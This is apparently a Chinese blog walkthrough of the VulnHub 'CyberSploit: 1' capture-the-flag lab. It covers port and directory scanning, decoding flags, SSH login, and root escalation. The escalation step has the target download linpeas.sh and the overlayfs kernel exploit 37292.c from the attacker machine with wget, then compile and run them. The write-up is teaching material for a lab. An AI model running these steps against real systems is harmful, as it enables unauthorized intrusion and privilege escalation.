vulnhub CyberSploit: 1

渗透思路:

nmap扫描 ---- 查看网页源代码 ---- gobuster扫描网站目录 ---- 命令行中base64解码 ---- ssh登录 ---- cyberchef解码二进制ascii码 ---- linpeas.sh检查提权可能性 ---- 内核漏洞提权

环境信息:

靶机:192.168.101.88

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.88

扫描到TCP 22(ssh)和80(http)端口

2、查看网页源代码发现用户名

浏览器访问80端口,发现一个网页

查看网页源代码,发现用户名itsskv

username:itsskv

3、gobuster扫描网站目录,得到密码(flag1)

gobuster dir -u http://192.168.101.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/robots和/hacker(/hacker下没啥,就是主页的图片)

浏览器访问http://192.168.101.88/robots,发现base64编码的信息

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

命令行中输入如下命令进行base64解码

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

得到flag1

Good Work !

Flag1: cybersploit{youtube.com/c/cybersploit}

4、ssh登录,二进制ascii码解码(flag2)

尝试以用户名itsskv,密码cybersploit{youtube.com/c/cybersploit}进行ssh登录

ssh itsskv@192.168.101.88

登录成功,在/home/itsskv下发现flag2.txt

flag2.txt中内容是二进制的ascii码

01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

拿到cyberchef中解码,选From Binary,得到flag2的内容

good work !

flag2: cybersploit{https:t.me/cybersploit1}

5、内核漏洞提权(flag3)

攻击机上linpeas.sh所在文件夹起http服务

python2 -m SimpleHTTPServer 80

靶机上执行如下命令,从攻击机下载linpeas.sh,添加可执行权限,并执行

wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas.sh发现了系统内核是有漏洞的3.13.0-32-generic

并且还给出了很可能提权成功的漏洞:overlayfs

exp的下载地址为:https://www.exploit-db.com/download/37292

先将exp下载到攻击机上,然后在靶机上执行如下命令,从攻击机上下载exp,编译,赋予编译后的文件可执行权限并执行

wget http://192.168.101.34/37292.c
gcc -o 37292 37292.c
chmod +x 37292
./37292

exp执行成功,得到root的shell,并在/root下找到finalflag.txt

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值